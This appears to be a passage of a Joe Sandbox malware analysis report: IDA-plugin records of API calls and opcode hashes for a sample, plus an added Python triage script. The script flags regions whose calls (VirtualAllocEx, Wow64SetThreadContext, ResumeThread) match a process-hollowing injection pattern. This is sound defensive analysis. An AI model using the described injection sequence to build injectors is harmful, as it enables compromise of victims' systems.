                                  • API String ID: 983334009-0
                                  • Opcode ID: e67775b53ce0aad1d02d9739920d84dcd7ab7af13d87276cceff7b8e610ad29a
                                  • Instruction ID: 2cf5469e9d939c8f45724de13a52660e553169779ee9faf87adfdc7e08a6c5e9
                                  • Opcode Fuzzy Hash: e67775b53ce0aad1d02d9739920d84dcd7ab7af13d87276cceff7b8e610ad29a
                                  • Instruction Fuzzy Hash: 232149B1D003098FDB10DFAAC5857EEBBF4EF48324F10842AD559A7240CB78A945CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0097D306,?,?,?,?,?), ref: 0097D3C7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: c11e7523639ac4110f638530a691ba027cf8b63afc9266a7f63119b5c3fb7b27
                                  • Instruction ID: 84b107c8270a155d736ac1fc345b156a61ae980a563dae0f05f9827352fa6160
                                  • Opcode Fuzzy Hash: c11e7523639ac4110f638530a691ba027cf8b63afc9266a7f63119b5c3fb7b27
                                  • Instruction Fuzzy Hash: 9D21E3B5901248DFDB10CFAAD584AEEBBF9FF48314F14841AE918A7350D378A940CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06ED49F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f2b63e79df638f5f36b113195c1d448ec930fcb2a1d1bde0140024deb46366a3
                                  • Instruction ID: ba635442d8d4d246ea03ffc7ae877ca994ed700d0a46af7db08cc34509b72973
                                  • Opcode Fuzzy Hash: f2b63e79df638f5f36b113195c1d448ec930fcb2a1d1bde0140024deb46366a3
                                  • Instruction Fuzzy Hash: AA1129718002499FDB20DFAAC8456EFBFF5EF48310F208419D559A7250C7759545CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0097B141,00000800,00000000,00000000), ref: 0097B352
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 63e5a56f4343d9e30c59933b6cac486711d17ca70588a2bc35a94dd2e2935894
                                  • Instruction ID: 12b46ff6776e9dce460d120346219f2c5bb08949fff31af960c7b98d42870bdb
                                  • Opcode Fuzzy Hash: 63e5a56f4343d9e30c59933b6cac486711d17ca70588a2bc35a94dd2e2935894
                                  • Instruction Fuzzy Hash: 3B1114B68003499FDB10DF9AC448BAEFBF8EB48310F10842AD519A7210C379A945CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0097B141,00000800,00000000,00000000), ref: 0097B352
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: fcabf2ce574a3bdd0530650a12bbcb687c9be44a45ea9d8aa2e588b607fc7827
                                  • Instruction ID: 52ce32c958bbc0f67afcba6e5ac9a6ae067fffc48ad2d5e08abe3d971222c389
                                  • Opcode Fuzzy Hash: fcabf2ce574a3bdd0530650a12bbcb687c9be44a45ea9d8aa2e588b607fc7827
                                  • Instruction Fuzzy Hash: C01123B68003499FDB20DFAAC444BEEFBF4EF48314F14842AD529A7210C379A585CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06ED49F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 369a4b94666e7775b96cd3125741ab191b166a23854f431f85ed112197e2dc3d
                                  • Instruction ID: e341dd04052a86c625ffacdd11b83a8c6ac0e886a93d57deca2811c8970cfe62
                                  • Opcode Fuzzy Hash: 369a4b94666e7775b96cd3125741ab191b166a23854f431f85ed112197e2dc3d
                                  • Instruction Fuzzy Hash: 3D1137718002499FCB10DFAAC845AEFBFF5EF48320F108419E519A7250C779A540CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: e9714687056a14facf718eca0c436251a6d04c2c95d47e352d045dca7addd1f7
                                  • Instruction ID: e737d4b729f20ffeb0d4a43c31fb6f82aefabd7b6434ecdc989022d0e2d3eae5
                                  • Opcode Fuzzy Hash: e9714687056a14facf718eca0c436251a6d04c2c95d47e352d045dca7addd1f7
                                  • Instruction Fuzzy Hash: 301128B1D003488EDB20DFAAD4457AEBBF5EF98314F208419D519A7250C779A545CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 956ccb84bb7e501133cf8d2003a628bce9ab767425f79443f211b975e25ae852
                                  • Instruction ID: 08edb103e67b57f1ab6be88bad715e025eec2da5d5014cb57c8593d866a30d28
                                  • Opcode Fuzzy Hash: 956ccb84bb7e501133cf8d2003a628bce9ab767425f79443f211b975e25ae852
                                  • Instruction Fuzzy Hash: 97113AB1D003488FCB10DFAAC4457AFFBF5EF88724F108419D519A7240CB79A544CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ED8EAD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 2c0e06691f5f456d2eaebba685abef1aaedd11ecf192f418a96d6fb7dec462e8
                                  • Instruction ID: 87e57f8e337c81eaafcd1677125fe1127be6fdfec57ff70ce449f375c097059c
                                  • Opcode Fuzzy Hash: 2c0e06691f5f456d2eaebba685abef1aaedd11ecf192f418a96d6fb7dec462e8
                                  • Instruction Fuzzy Hash: 1C1103B58003489FDB10DF9AC845BEFFBF8EB48714F10845AE919A7201C379A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0097B0C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0
                                  • Opcode ID: 67f05dff4816bcea6821eb4bab75b43f32fbc1a06d106579fd0a16f2b15e7e61
                                  • Instruction ID: ccc85dbc1819f196d0c79d2a5735bd49fdaedd24fa178485129166bef9a303f1
                                  • Opcode Fuzzy Hash: 67f05dff4816bcea6821eb4bab75b43f32fbc1a06d106579fd0a16f2b15e7e61
                                  • Instruction Fuzzy Hash: B811FDB68003498ECB20DF9AC444B9EFBF8EF89310F10841AD429A7204C379A545CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ED8EAD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 951c6f08fcb5c49791a2bdc6d17a5c2de9ae72ed62038c09d014057d0af69d6b
                                  • Instruction ID: 54a6867da39f0d613e6160e4e956ed6ed2c174c7bcdc8b729116aab65e2a01d4
                                  • Opcode Fuzzy Hash: 951c6f08fcb5c49791a2bdc6d17a5c2de9ae72ed62038c09d014057d0af69d6b
                                  • Instruction Fuzzy Hash: E711F2B58003489FDB10DF9AD885BEEFBF4EB48324F20855AD529A3250C379A584CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%
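
The per-function records above are raw IDA-plugin output, one API reference per function, so the calls that matter for the "Injects a PE file into a foreign processes" and "Creates a process in suspended mode" signatures earlier in this report are scattered: VirtualAllocEx (ref 06ED49F6), Wow64SetThreadContext (ref 06ED492E) and the two ResumeThread functions all sit in the same 06ED0000 dump region, which is the allocate-in-target, rewrite-thread-context, resume pattern of a hollowing-style injector (Wow64SetThreadContext means the target thread is a 32-bit WOW64 thread). The script below is an added example, not Joe Sandbox code and not part of this report: it parses an excerpt of the records above (a constructed sample with abbreviated Source File names, reproducing the fact that the two ResumeThread records carry no call line and only an "API ID" field), groups the calls by dump offset, flags regions whose call set matches an injection indicator list, and decodes the Msg argument of the PostMessageW call (00000010 is WM_CLOSE). The indicator list and the three-call threshold are assumptions chosen for this example, not a Joe Sandbox rule.

```python
"""Group the API references in a Joe Sandbox IDA-plugin function dump by memory
region and flag regions whose call set looks like remote PE injection.
Added example; the record format is the one shown in the report, the
indicator list and threshold below are assumptions."""
import re
from collections import defaultdict

# Constructed sample: six records copied from the report, Source File names
# shortened and the Snapshot/Similarity lines that carry no API data dropped.
SAMPLE_RECORDS = """\
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ED492E
Memory Dump Source
• Source File: 00000000.00000002.2019224285.0000000006ED0000.sdmp, Offset: 06ED0000, based on PE: false
• API ID: ContextThreadWow64
Uniqueness Score: -1.00%
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0097D306,?,?,?,?,?), ref: 0097D3C7
Memory Dump Source
• Source File: 00000000.00000002.2000651487.0000000000970000.sdmp, Offset: 00970000, based on PE: false
• API ID: DuplicateHandle
Uniqueness Score: -1.00%
APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06ED49F6
Memory Dump Source
• Source File: 00000000.00000002.2019224285.0000000006ED0000.sdmp, Offset: 06ED0000, based on PE: false
• API ID: AllocVirtual
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000000.00000002.2019224285.0000000006ED0000.sdmp, Offset: 06ED0000, based on PE: false
• API ID: ResumeThread
Uniqueness Score: -1.00%
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 06ED8EAD
Memory Dump Source
• Source File: 00000000.00000002.2019224285.0000000006ED0000.sdmp, Offset: 06ED0000, based on PE: false
• API ID: MessagePost
Uniqueness Score: -1.00%
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0097B141,00000800,00000000,00000000), ref: 0097B352
Memory Dump Source
• Source File: 00000000.00000002.2000651487.0000000000970000.sdmp, Offset: 00970000, based on PE: false
• API ID: LibraryLoad
Uniqueness Score: -1.00%
"""

# "• Api.MODULE(arg,arg,...), ref: ADDRESS"
CALL_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
OFFSET_RE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+)")
APIID_RE = re.compile(r"^•\s*API ID:\s*(?P<id>\S*)")

# Assumed indicator set for allocate/write/set-context/resume style injection.
INJECTION_APIS = {"VirtualAllocEx", "WriteProcessMemory", "NtWriteVirtualMemory",
                  "SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread",
                  "ResumeThread", "NtResumeThread", "NtUnmapViewOfSection"}

WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x0012: "WM_QUIT"}


def parse_records(text):
    """Yield one dict per record: dump offset, parsed call tuples, and the API ID field.
    A record ends at its 'Uniqueness Score' line."""
    rec = {"offset": None, "calls": [], "api_id": ""}
    for line in text.splitlines():
        line = line.strip()
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            rec["calls"].append((m.group("api"), m.group("module"), args, m.group("ref")))
            continue
        if line.startswith("•") and "Source File" in line:
            m = OFFSET_RE.search(line)
            rec["offset"] = m.group("offset") if m else None
            continue
        m = APIID_RE.match(line)
        if m:
            rec["api_id"] = m.group("id")
            continue
        if line.startswith("Uniqueness Score"):
            yield rec
            rec = {"offset": None, "calls": [], "api_id": ""}


def apis_by_region(text):
    """Map each dump offset to the set of API names referenced from it."""
    regions = defaultdict(set)
    for rec in parse_records(text):
        names = {api for api, _, _, _ in rec["calls"]}
        if not names and rec["api_id"]:
            # Records with no call line (the ResumeThread ones) keep only the
            # plugin's API ID. That field is a reordered token form for most
            # APIs ("AllocVirtual" for VirtualAllocEx), so use it as a fallback
            # only; here it happens to be the real export name.
            names = {rec["api_id"]}
        regions[rec["offset"]] |= names
    return dict(regions)


def injection_regions(regions, min_hits=3):
    """Return {offset: sorted matched indicator APIs} for regions with >= min_hits."""
    flagged = {}
    for offset, names in regions.items():
        hits = sorted(names & INJECTION_APIS)
        if len(hits) >= min_hits:
            flagged[offset] = hits
    return flagged


def decode_post_message(call):
    """Name the Msg argument of a PostMessageW/A call when it is a known constant."""
    api, _, args, _ = call
    if not api.startswith("PostMessage") or len(args) < 2 or args[1] == "?":
        return None
    msg = int(args[1], 16)
    return WINDOW_MESSAGES.get(msg, hex(msg))


if __name__ == "__main__":
    regions = apis_by_region(SAMPLE_RECORDS)
    for offset, hits in injection_regions(regions).items():
        print(f"region {offset}: injection indicators {hits}")
    for rec in parse_records(SAMPLE_RECORDS):
        for call in rec["calls"]:
            if call[0].startswith("PostMessage"):
                print(f"{call[0]} at {call[3]}: Msg = {decode_post_message(call)}")
```

On the sample, only the 06ED0000 region is flagged (ResumeThread, VirtualAllocEx, Wow64SetThreadContext); the 00970000 region holds DuplicateHandle and LoadLibraryExW, which are ordinary runtime activity on their own. Missing WriteProcessMemory in a flagged region is expected with this kind of dump: the plugin records one reference per function and not every function that the sandbox hit is listed, so treat the indicator count as a triage hint, not proof.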

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000131399.00000000006DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6dd000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37ec84c03e39ddce7d0135809ec33a9a1d42ecb1f1e2d04bc6882998ddedc12e
                                  • Instruction ID: dcf83bc01fa2ec258c37db2cf1696315cea90daac35c2e7c56f525456169da3c
                                  • Opcode Fuzzy Hash: 37ec84c03e39ddce7d0135809ec33a9a1d42ecb1f1e2d04bc6882998ddedc12e
                                  • Instruction Fuzzy Hash: 2C212871900204DFDB15EF14D9C0F2ABFA6FB98324F20C56AD9090B356C33AE856D7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000191743.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bea7c158f7f582285efac7b06ee94ae932c155c4f5c3e17e31032907b40bf4f6
                                  • Instruction ID: 8f0285f8c14545185f4171bf59f36bf48666be56e6ca4f4af082c8e35dc3f26c
                                  • Opcode Fuzzy Hash: bea7c158f7f582285efac7b06ee94ae932c155c4f5c3e17e31032907b40bf4f6
                                  • Instruction Fuzzy Hash: 5F21F271604384DFCB14DF24D984B26BF66FB88314F28C569D90A4B396C33AD847CA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000191743.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eac55fb3b2c3704db3a0bbfda7b08e9dd33d9df70607daa955728c28622f7246
                                  • Instruction ID: d60a54644295da60f1b8031e5c843f2007e8c771a7d8757865f96482e19e5d8e
                                  • Opcode Fuzzy Hash: eac55fb3b2c3704db3a0bbfda7b08e9dd33d9df70607daa955728c28622f7246
                                  • Instruction Fuzzy Hash: 7721F275504384EFDB05DF25D9C0B26BBA6FB88314F20C56DEA094B396C33AD906DA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000191743.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f88f01c4b497c881a0cd02fec18b43ba0618b4e2f6530f7b52039d7fc6752a76
                                  • Instruction ID: 5eae2cde66a5f1fb4769d769ff5e4d63511e2e9e341d2843fb3a69b56bd30247
                                  • Opcode Fuzzy Hash: f88f01c4b497c881a0cd02fec18b43ba0618b4e2f6530f7b52039d7fc6752a76
                                  • Instruction Fuzzy Hash: 33215E755093C08FDB12CF24D994755BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000131399.00000000006DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6dd000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: fd0aa97e85632751e59951922ad1736295ac342e2093bfe2e9f5b062cbd2ae13
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: 68112972804240DFCB12DF00D5C4B56BFB2FB94324F24C6AAD9090B356C33AE456CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000191743.00000000006ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 006ED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: bf25036823362e7365348875fbd4585e5948ea58054212d7b2ebbc135ef9710f
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: F511BB75504380DFCB02CF10C5C4B15BBA2FB84314F24C6A9DA494B396C33AD80ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000131399.00000000006DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6dd000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07f68d0b977331d30f12656b5f71d54f3f8f64b1aa1a5b45777bcbaeb4f48a77
                                  • Instruction ID: eba5bad6c494ab9d7a17cb448703d36c0105c682dfed9610244b4ae4005acbd5
                                  • Opcode Fuzzy Hash: 07f68d0b977331d30f12656b5f71d54f3f8f64b1aa1a5b45777bcbaeb4f48a77
                                  • Instruction Fuzzy Hash: FA01DB71904344AAE720AF25CD84B67BF9DEF56324F18C5ABED090B386D2799841CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000131399.00000000006DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006DD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6dd000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5770246ab56dd3af1b67b5578d483dc7331527485455897e35039ec5daf17520
                                  • Instruction ID: 1e45e1a9928ff8ff86ec767ed090d88b1e5aca0b0ee73cb11ae219414ae9327d
                                  • Opcode Fuzzy Hash: 5770246ab56dd3af1b67b5578d483dc7331527485455897e35039ec5daf17520
                                  • Instruction Fuzzy Hash: 30F06271804344AAE7209E16C888BA2FF98EF56734F18C45BED4C4B386C2799844CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: efa1a1c1a7b3d15b687752fd7afb1129743e468e564d25ec086877ad566c42e6
                                  • Instruction ID: 8ff5513c61bdf6cc02f2c90ce1e841801704abe2aa3a48f943c2c64fc09bc7ea
                                  • Opcode Fuzzy Hash: efa1a1c1a7b3d15b687752fd7afb1129743e468e564d25ec086877ad566c42e6
                                  • Instruction Fuzzy Hash: 7A12B8F2C817658BE319CF25E94C1A93BB1BB41314BD08A09D1E16F2E6D7B4916ECF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 211c39c37c05e704b1ea4a36aade9b87b3ecd446189931fb593c68b6166aedb5
                                  • Instruction ID: 945576d25618ad7e2ebadb18b326bb1ae3d5bb8fa496f2efbf68a7bfc2f14b9b
                                  • Opcode Fuzzy Hash: 211c39c37c05e704b1ea4a36aade9b87b3ecd446189931fb593c68b6166aedb5
                                  • Instruction Fuzzy Hash: 95E1E774E10219CFDB14DFA9C580AAEFBF2BF89305F249169D414AB356D730A942CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c58e88c623a29c41c6a313a39c105b9a39f6394b772ed42ad8dcb15a8a0c18a0
                                  • Instruction ID: 4ed326986abf8165ff2b02c759b0cb44bf404be0c3c9b845198b97c0660334fe
                                  • Opcode Fuzzy Hash: c58e88c623a29c41c6a313a39c105b9a39f6394b772ed42ad8dcb15a8a0c18a0
                                  • Instruction Fuzzy Hash: D5E11D74E002198FDB14DFA9C580AAEFBB2FF89305F249169D404AB359D730AD42CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c778c60e7816469f1a35ecad15362c3e31d1635fd45ca8ebf078020221055913
                                  • Instruction ID: 156ee6746b676bf5154697f5a7433f9b25cb2273cc68f7d1bfe4fb8c46c58f3b
                                  • Opcode Fuzzy Hash: c778c60e7816469f1a35ecad15362c3e31d1635fd45ca8ebf078020221055913
                                  • Instruction Fuzzy Hash: 5EE12B74E102198FDB14DFA9C580AAEFBF2FF88305F249169D404AB356D731A942CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bbeb480c42477013b0c7e48f2a6f760d884523598d549cfe9be8f46e4e2bf5de
                                  • Instruction ID: 77fac6e0a502d6e3b5276b8fa9ad79864bdf3fffe1a83850211d5054c81f35f4
                                  • Opcode Fuzzy Hash: bbeb480c42477013b0c7e48f2a6f760d884523598d549cfe9be8f46e4e2bf5de
                                  • Instruction Fuzzy Hash: 93E12A74E102198FDB14DFA9C580AAEFBB2FF89305F249169D414AB356D730AD42CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2019224285.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6ed0000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8083d2561d5cfcac694c71da3efc1a617d0d793fb821280c3f456d2b94ef71f2
                                  • Instruction ID: cd1004c4935addff263c63bd179acf4516a2c3efc8624dab186f152261c96ff4
                                  • Opcode Fuzzy Hash: 8083d2561d5cfcac694c71da3efc1a617d0d793fb821280c3f456d2b94ef71f2
                                  • Instruction Fuzzy Hash: 9FE13B74E102198FDB14DFA9C5809AEFBF2FF89305F249169D514AB316D731AA42CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2000651487.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_970000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 200544280135e21c94a6994e623ca27092e96a954cbd2c4fdedaa05cce77de3e
                                  • Instruction ID: c04697bce2b7bf10a468c9872ad131c81a93e7ae626fc02922e520f14aa20766
                                  • Opcode Fuzzy Hash: 200544280135e21c94a6994e623ca27092e96a954cbd2c4fdedaa05cce77de3e
                                  • Instruction Fuzzy Hash: B6A17C32E006158FCF19DFB4C8445AEB7B6FF85300B15857AE819BB266DB31E916CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2012790551.0000000004A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4a90000_P020241901.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f16fb8c738b84faab5394b1e643fd6f45bb9889f0c241683d8cf271bc14f742d
